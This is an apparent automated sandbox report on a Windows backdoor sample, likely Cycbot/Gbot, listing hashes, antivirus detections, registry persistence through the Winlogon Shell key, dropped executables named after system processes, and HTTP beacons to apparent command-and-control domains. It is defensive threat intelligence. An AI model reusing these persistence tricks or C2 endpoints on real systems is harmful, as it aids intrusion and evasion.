Analysis Date: 2015-01-17 13:42:15
MD5: 6d49361163006f1a1b2501a17d872aef
SHA1: 5f377286fde22ce4bf6182dc49964c076ddbf9b0

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 914e4038d91a6abfc61a9c5492ecd65f sha1: c9949241a70f2d0ce74fda0e51656ac8a32f0a63 size: 111104
Section: .rdata md5: 57a0022ddfcfae76f8637c6665a9aa9e sha1: 29cd8fcaf07aabd1bd79211516a47e8393c62d36 size: 1024
Section: .data md5: 9194d7f1052ea45eba37ee7bd99b6473 sha1: 2793eee161feeb8770ddc125506e8386b207501d size: 24064
Section: .rsrc md5: 6319241d5c8741fa29e69070d561c4f1 sha1: de95a30fc845834620788159bd08642479a1456b size: 1024
Timestamp: 2005-10-28 13:48:12
Version: PrivateBuild: 1090
PEhash: c73c9c9b295fe0eca19e76c02e690e1d3aeab898
IMPhash: 590c209ebfe487dd0185ee4f2ed7e31c
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Diple-19
AV Dr. Web: Trojan.DownLoader1.42758
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.IVA
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Renos.GTC
AV Grisoft (avg): Agent.5.BJ
AV Ikarus: Packed.Win32.Krap
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.bs
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.e
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: no_virus
AV Sophos: Troj/FakeAV-CDG
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): Trojan.MTA.01004

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: zoneck.com
Winsock DNS: www.google.com
Winsock DNS: dolbyaudiodevice.com
Winsock DNS: motherboardstest.com
Winsock DNS: 127.0.0.1
Winsock DNS: zonejm.com
Winsock DNS: pcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: pcdocpro.com (Type: A) ➝ 209.59.161.20
DNS: www.google.com (Type: A) ➝ 173.194.37.81
DNS: www.google.com (Type: A) ➝ 173.194.37.80
DNS: www.google.com (Type: A) ➝ 173.194.37.84
DNS: www.google.com (Type: A) ➝ 173.194.37.83
DNS: www.google.com (Type: A) ➝ 173.194.37.82
DNS: zoneck.com (Type: A) ➝ 208.79.234.132
DNS: motherboardstest.com (Type: A) ➝ 204.11.56.45
DNS: zonejm.com (Type: A) ➝ 23.239.15.54
DNS: dolbyaudiodevice.com (Type: A)
DNS: xibudific.cn (Type: A)
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://pcdocpro.com/images/logo-2.jpg?tq=gP4aKydeAYLu%2BYaO2jhHjYMkvJ6cJ5uw4kHXvAyZhDe5WlwW%2Fn5TGUl2qH1OKtvZ%2FMTkvFS0fW7lJi2Rv10zuDmNWwtG5VSYCC4pJ%2FO4kYJ7%2FYSHvU8vDr4wcNMN%2F6B2pMcuj4QtVRyDfNt%2FmM3PsWEokl5pEjj7b0p7l3%2FbdJdFSLwC9mPbSMw%2BVAcivYguBCGX4FDJiJyJAaBYcpracTm3YmdCpigZC8aMEpEBMYZWPAKJqdyVz1MeUgkPZHLCHsPgwrqJE%2F62qHxdPKOU%2B6M6y1ZToRJy4ZMckTeqyF9v33gb15mfmoNSZukU9IDx8M5IKqGs9yKKfW%2BMByi%2BTJ2vyRtbBzfG7M%2BrH3LWNOKPJuz4e7q4skxZkpdvbaG7ehDOGCVyMijFeGnnyemXaClYY7aa0FhWNTw6tUNGg1%2B2FnChli%2BhEq602RNi09Wgvrt1k0ZbxPEonYstgPafTkY0lyfQCJPhtwiHUqj5o5bkrhNVLujYu4niOm2sHxyhur46l%2FSns6
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUjSsw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUjSsw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxLpSK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQj1OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQj1OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1031 ➝ 173.194.37.81:80
Flows TCP: 192.168.1.1:1032 ➝ 209.59.161.20:80
Flows TCP: 192.168.1.1:1033 ➝ 173.194.37.81:80
Flows TCP: 192.168.1.1:1034 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1035 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1036 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1037 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1038 ➝ 23.239.15.54:80

Raw Pcap

Strings
